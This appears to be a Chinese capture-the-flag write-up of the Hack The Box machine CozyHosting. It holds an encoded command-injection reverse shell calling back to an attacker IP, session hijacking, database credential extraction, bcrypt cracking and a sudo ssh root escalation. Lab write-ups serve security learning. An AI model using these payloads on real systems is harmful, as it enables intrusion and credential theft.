扫描靶机
nmap -sC -sV -Pn 10.10.11.230Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 08:23 CSTNmap scan report for 10.10.11.230Host is up (0.32s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSIONopen ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)ssh-hostkey:256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)open http nginx 1.18.0 (Ubuntu): Did not follow redirect to http://cozyhosting.htb: nginx/1.18.0 (Ubuntu)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 22.02 seconds┌──(root㉿uu)-[/home/uu/CozyHosting]curl 10.10.11.230 -I | grep LocationTotal % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed0 178 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Location: http://cozyhosting.htb
拿到了一个域名,写进去hosts,然后打开
echo 10.10.11.230 cozyhosting.htb | tee -a /etc/hosts
进入网页后,就 只有一个登录按钮,没有其他的表单,我使用dirsearch对目录进行fuzz
_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/cozyhosting.htb/-_23-09-06_08-27-44.txtError Log: /root/.dirsearch/logs/errors-23-09-06_08-27-44.logTarget: http://cozyhosting.htb/[] Starting:[] 200 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js[] 400 - 435B - /..................etcpasswd[] 400 - 435B - /a%5c.aspx[] 200 - 634B - /actuator[] 200 - 5KB - /actuator/env[] 200 - 15B - /actuator/health[] 200 - 10KB - /actuator/mappings[] 200 - 48B - /actuator/sessions[] 200 - 124KB - /actuator/beans[] 401 - 97B - /admin[] 200 - 0B - /engine/classes/swfupload//swfupload.swf[] 200 - 0B - /engine/classes/swfupload//swfupload_f9.swf[] 500 - 73B - /error[] 200 - 0B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[] 200 - 0B - /extjs/resources//charts.swf[] 200 - 0B - /html/js/misc/swfupload//swfupload.swf[] 200 - 12KB - /index[] 200 - 4KB - /login[] 200 - 0B - /login.wdm%2e[] 204 - 0B - /logout[] 400 - 435B - /servlet/%C0%AE%C0%AE%C0%AFTask Completed
我们可以看到有一个可疑的目录,就是/actuator/*。如果我们进入路径是/actuator/sessions,可以看到有未授权和kanderson会话
进入后台修改json参数
输入kanderson用户名跟密码kanderson,直接登录,就进入到了管理员管理员界面
然后拉到下面有个表单,抓一个包
POST /executessh HTTP/1.1Host: cozyhosting.htbUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 44Origin: http://cozyhosting.htbConnection: closeReferer: http://cozyhosting.htb/adminCookie: JSESSIONID=AD9D3CEFDCDDE5E313F6CD231C67EFC5Upgrade-Insecure-Requests: 1host=10.10.14.5&username=zhiyinnitaimei
可以看到右边的返回,出现了一条ssh链接断线的信息,说明这个包是跟ssh链接有关,取消username的输出,可以看到ssh的help内容
尝试输入命令注入,将payload成bash64
;echo${IFS}"L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjUvNDQ0NCAwPiYx"|base64${IFS}-d|bash;
输入ls命令后,可以发现底下有个jar文件,下载下来,用python服务器
然后解压包,会发现psql的用户名跟密码,该文件在/home/uu/CozyHosting/BOOT-INF/classes/
jar -xvf cloudhosting-0.0.1.jarserver.address=127.0.0.1server.servlet.session.timeout=5mmanagement.endpoints.web.exposure.include=health,beans,env,sessions,mappingsmanagement.endpoint.sessions.enabled = truespring.datasource.driver-class-name=org.postgresql.Driverspring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialectspring.jpa.hibernate.ddl-auto=nonespring.jpa.database=POSTGRESQLspring.datasource.platform=postgresspring.datasource.url=jdbc:postgresql://localhost:5432/cozyhostingspring.datasource.username=postgresspring.datasource.password=Vg&nvzAQ7XxR
然后重新连接shell,然后加固一下(https://brain2life.hashnode.dev/how-to-stabilize-a-simple-reverse-shell-to-a-fully-interactive-terminal?source=post_page-----3db77d07bc06--------------------------------)
psql "postgresql://postgres:Vg&nvzAQ7XxR@localhost/postgres"SELECT $ FROM users;ERROR: syntax error at or near "$"LINE 1: SELECT $ FROM users;^SELECT * FROM users;name | password | role-----------+--------------------------------------------------------------+-------kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | Useradmin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin(2 rows)
将hash保存,然后爆破,我用的是john,后面要加入—format=bcrypt参数
# john --wordlist=/home/uu/rockyou.txt hash --format=bcryptUsing default input encoding: UTF-8Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])Cost 1 (iteration count) is 1024 for all loaded hashesWill run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusmanchesterunited (?)1g 0:00:00:35 DONE (2023-09-06 11:22) 0.02779g/s 78.04p/s 78.04c/s 78.04C/s dougie..keyboardUse the "--show" option to display all of the cracked passwords reliablySession completed.
然后使用ssh登录
成功拿到user flag:7868b028495df5b9759bb6d502a7342c,输入sudo -l查看提权路径
利用ssh提权,在网上查找
https://gtfobins.github.io/gtfobins/ssh/#sudo
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
成功拿到root flag:a7916a1f641bbb7b83c567e6338376bf
root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2:19577:0:99999:7:::
原文始发于微信公众号(hades zorejt):HTB-CozyHosting笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论